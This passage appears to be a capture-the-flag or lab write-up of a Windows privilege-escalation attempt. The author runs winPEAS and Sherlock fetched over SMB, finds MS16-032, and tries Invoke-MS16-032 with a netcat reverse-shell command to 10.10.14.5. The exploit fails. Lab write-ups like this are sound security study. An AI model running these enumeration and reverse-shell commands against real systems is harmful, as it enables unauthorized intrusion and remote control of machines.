PEAS
ps c:\tmp> copy \\10.10.14.5\smb\winPEASany.exe
ps c:\tmp> cmd.exe /c C:\tmp\winPEASany.exeBinary transferred over SMB and executed
Watson failed to execute due to the target system not having the minimum .NET Framework 4.25
No AV
Everything else was all enumerated earlier Nothing new was discovered.
Sherlock
Since Watson was never execute, I will opt out for Sherlock.
PS C:\tmp> copy \\10.10.14.5\smb\Sherlock.ps1
PS C:\tmp> . .\Sherlock.ps1
PS C:\tmp> Find-AllVulns
Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears VulnerableSherlock found a single vulnerability; CVE-2016-0099
This has to be confirmed
Invoke-MS16-032
ps c:\tmp> Invoke-MS16-032 -Command "C:\tmp\nc64.exe 10.10.14.5 1234 -e cmd.exe"
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[!] No valid thread handles were captured, exiting!It failed.